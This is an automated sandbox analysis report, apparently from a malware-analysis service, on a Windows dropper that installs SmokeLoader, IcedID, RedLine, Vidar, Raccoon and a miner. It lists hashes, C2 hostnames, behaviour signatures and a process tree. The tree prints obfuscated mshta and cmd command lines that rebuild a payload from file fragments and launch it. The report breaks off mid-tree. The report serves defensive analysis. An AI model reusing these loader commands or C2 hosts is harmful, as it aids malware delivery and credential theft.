Overview

overview

10

Static

static

Fri051e1e7444.exe

windows7_x64

10

Fri051e1e7444.exe

windows7_x64

10

Fri051e1e7444.exe

windows7_x64

10

Fri051e1e7444.exe

windows11_x64

10

Fri051e1e7444.exe

windows10_x64

10

Fri051e1e7444.exe

windows10_x64

10

Fri051e1e7444.exe

windows10_x64

10

Resubmissions

23-10-2021 15:52

211023-tbkbesdcfm 10

22-10-2021 17:40

211022-v8trsscggr 10

22-10-2021 15:55

211022-tc9ygacgan 10

22-10-2021 14:38

211022-rz1bfabgb8 10

Analysis

  • max time kernel
    740s
  • max time network
    1832s
  • platform
    windows11_x64
  • resource
    win11
  • submitted
    22-10-2021 14:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Fri051e1e7444.exe

  • Size

    403KB

  • MD5

    b4c503088928eef0e973a269f66a0dd2

  • SHA1

    eb7f418b03aa9f21275de0393fcbf0d03b9719d5

  • SHA256

    2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2

  • SHA512

    c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

Score
10/10
icedidraccoonredlinesmokeloadersocelarsvidarxmrig1875681804backdoorbankerdiscoveryevasioninfostealerminerpersistencespywarestealerthemidatrojan

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://gejajoo7.top/

http://sysaheu9.top/
rc4.i32
rc4.i32

Extracted

Family

icedid

Campaign

1875681804

C2

enticationmetho.ink

Signatures

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

    trojanbankericedid
  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 16 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

    evasion
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • Vidar Stealer 3 IoCs
    stealer
  • Blocklisted process makes network request 40 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 6 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 8 IoCs
    persistence
  • Checks for any installed AV software in registry 1 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 10 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 38 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 16 IoCs
  • NSIS installer 4 IoCs
    installer
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Download via BitsAdmin 1 TTPs 2 IoCs
    dropper
  • Enumerates system info in registry 2 TTPs 35 IoCs
  • Kills process with taskkill 4 IoCs
    evasion
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 8 IoCs
  • Modifies system certificate store 2 TTPs 11 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe
    "C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2860
    • C:\Users\Admin\Pictures\Adobe Films\CoEA_w0kyWG2WXlI_NmzGIeB.exe
      "C:\Users\Admin\Pictures\Adobe Films\CoEA_w0kyWG2WXlI_NmzGIeB.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:2224
    • C:\Users\Admin\Pictures\Adobe Films\6U5d9bdqsMb6CVYEgAtCoc7k.exe
      "C:\Users\Admin\Pictures\Adobe Films\6U5d9bdqsMb6CVYEgAtCoc7k.exe"
      2⤵
      • Executes dropped EXE
      PID:4424
    • C:\Users\Admin\Pictures\Adobe Films\QLESn8qIBxPtJtPRbSsyAENo.exe
      "C:\Users\Admin\Pictures\Adobe Films\QLESn8qIBxPtJtPRbSsyAENo.exe"
      2⤵
      • Executes dropped EXE
      PID:1500
      • C:\Users\Admin\Documents\wfTqKDpMOg0gUSDI4WZ8cFpx.exe
        "C:\Users\Admin\Documents\wfTqKDpMOg0gUSDI4WZ8cFpx.exe"
        3⤵
        • Executes dropped EXE
        PID:3804
        • C:\Users\Admin\Pictures\Adobe Films\mx4lGdzRmaOHuNV50QSkuYOw.exe
          "C:\Users\Admin\Pictures\Adobe Films\mx4lGdzRmaOHuNV50QSkuYOw.exe"
          4⤵
          • Executes dropped EXE
          PID:3040
        • C:\Users\Admin\Pictures\Adobe Films\fnK4zd6skiJ7xVbd0NQxDWHw.exe
          "C:\Users\Admin\Pictures\Adobe Films\fnK4zd6skiJ7xVbd0NQxDWHw.exe"
          4⤵
          • Executes dropped EXE
          PID:5412
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 1728
            5⤵
            • Program crash
            • Checks processor information in registry
            • Enumerates system info in registry
            PID:5548
        • C:\Users\Admin\Pictures\Adobe Films\ecofo8a9dM9rKhtzF6DUe5WS.exe
          "C:\Users\Admin\Pictures\Adobe Films\ecofo8a9dM9rKhtzF6DUe5WS.exe"
          4⤵
          • Executes dropped EXE
          PID:480
        • C:\Users\Admin\Pictures\Adobe Films\DQSpoAhLIdEaLNFmPL1y_5AQ.exe
          "C:\Users\Admin\Pictures\Adobe Films\DQSpoAhLIdEaLNFmPL1y_5AQ.exe" /mixtwo
          4⤵
          • Executes dropped EXE
          PID:3696
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3696 -s 260
            5⤵
            • Program crash
            PID:2104
        • C:\Users\Admin\Pictures\Adobe Films\YsPBMke_f_nLTfrT7402u0TT.exe
          "C:\Users\Admin\Pictures\Adobe Films\YsPBMke_f_nLTfrT7402u0TT.exe"
          4⤵
          • Executes dropped EXE
          PID:3480
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3480 -s 252
            5⤵
            • Program crash
            • Checks processor information in registry
            • Enumerates system info in registry
            PID:5176
        • C:\Users\Admin\Pictures\Adobe Films\lyDzuY17TkHEDB9thlwY6UXK.exe
          "C:\Users\Admin\Pictures\Adobe Films\lyDzuY17TkHEDB9thlwY6UXK.exe"
          4⤵
          • Executes dropped EXE
          PID:3432
        • C:\Users\Admin\Pictures\Adobe Films\0avwqQL9G3rPBLd3vS74Ps8l.exe
          "C:\Users\Admin\Pictures\Adobe Films\0avwqQL9G3rPBLd3vS74Ps8l.exe"
          4⤵
          • Executes dropped EXE
          PID:4036
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\0avwqQL9G3rPBLd3vS74Ps8l.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\0avwqQL9G3rPBLd3vS74Ps8l.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
            5⤵
              PID:6112
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\0avwqQL9G3rPBLd3vS74Ps8l.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\0avwqQL9G3rPBLd3vS74Ps8l.exe" ) do taskkill -f -iM "%~NxM"
                6⤵
                  PID:2020
                  • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                    ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                    7⤵
                    • Executes dropped EXE
                    PID:4812
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                      8⤵
                        PID:3156
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                          9⤵
                            PID:4688
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                          8⤵
                            PID:5644
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                              9⤵
                                PID:5396
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                  10⤵
                                    PID:788
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                    10⤵
                                      PID:4456
                                    • C:\Windows\SysWOW64\msiexec.exe
                                      msiexec -Y ..\lXQ2g.WC
                                      10⤵
                                      • Loads dropped DLL
                                      PID:5036
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill -f -iM "0avwqQL9G3rPBLd3vS74Ps8l.exe"
                                7⤵
                                • Kills process with taskkill
                                PID:5880
                        • C:\Users\Admin\Pictures\Adobe Films\On307XjhofH5hpn3XhRr0UJT.exe
                          "C:\Users\Admin\Pictures\Adobe Films\On307XjhofH5hpn3XhRr0UJT.exe"
                          4⤵
                          • Executes dropped EXE
                          PID:6040
                          • C:\Users\Admin\AppData\Local\Temp\is-6TSP9.tmp\On307XjhofH5hpn3XhRr0UJT.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-6TSP9.tmp\On307XjhofH5hpn3XhRr0UJT.tmp" /SL5="$2029C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\On307XjhofH5hpn3XhRr0UJT.exe"
                            5⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            PID:4788
                            • C:\Users\Admin\AppData\Local\Temp\is-95FI4.tmp\DYbALA.exe
                              "C:\Users\Admin\AppData\Local\Temp\is-95FI4.tmp\DYbALA.exe" /S /UID=2709
                              6⤵
                              • Drops file in Drivers directory
                              • Executes dropped EXE
                              • Adds Run key to start application
                              PID:5916
                              • C:\Program Files\Reference Assemblies\JQIFIOEXVY\foldershare.exe
                                "C:\Program Files\Reference Assemblies\JQIFIOEXVY\foldershare.exe" /VERYSILENT
                                7⤵
                                  PID:5428
                                • C:\Users\Admin\AppData\Local\Temp\ba-7ddc2-0ef-cec9c-f5c75d27c13e0\Duxaqabaequ.exe
                                  "C:\Users\Admin\AppData\Local\Temp\ba-7ddc2-0ef-cec9c-f5c75d27c13e0\Duxaqabaequ.exe"
                                  7⤵
                                    PID:2160
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                      8⤵
                                      • Adds Run key to start application
                                      • Enumerates system info in registry
                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                      • Suspicious use of FindShellTrayWindow
                                      PID:5848
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a54718
                                        9⤵
                                          PID:2268
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2
                                          9⤵
                                            PID:4072
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:3
                                            9⤵
                                              PID:1012
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:8
                                              9⤵
                                                PID:5992
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
                                                9⤵
                                                  PID:3772
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
                                                  9⤵
                                                    PID:5268
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4204 /prefetch:1
                                                    9⤵
                                                      PID:5792
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:1
                                                      9⤵
                                                        PID:6784
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4268 /prefetch:1
                                                        9⤵
                                                          PID:6340
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4868 /prefetch:8
                                                          9⤵
                                                            PID:6276
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
                                                            9⤵
                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                            PID:6664
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:1
                                                            9⤵
                                                              PID:6392
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6124 /prefetch:8
                                                              9⤵
                                                                PID:4708
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6124 /prefetch:8
                                                                9⤵
                                                                  PID:5804
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5364 /prefetch:2
                                                                  9⤵
                                                                    PID:2396
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:1
                                                                    9⤵
                                                                      PID:1964
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6156 /prefetch:1
                                                                      9⤵
                                                                        PID:6616
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6464 /prefetch:1
                                                                        9⤵
                                                                          PID:5648
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6424 /prefetch:1
                                                                          9⤵
                                                                          • Loads dropped DLL
                                                                          • Modifies registry class
                                                                          PID:1164
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:1
                                                                          9⤵
                                                                            PID:6608
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1
                                                                            9⤵
                                                                              PID:5036
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:1
                                                                              9⤵
                                                                                PID:4512
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:1
                                                                                9⤵
                                                                                  PID:5980
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1060 /prefetch:1
                                                                                  9⤵
                                                                                    PID:5784
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5772 /prefetch:1
                                                                                    9⤵
                                                                                      PID:416
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
                                                                                      9⤵
                                                                                        PID:5536
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:1
                                                                                        9⤵
                                                                                          PID:5392
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
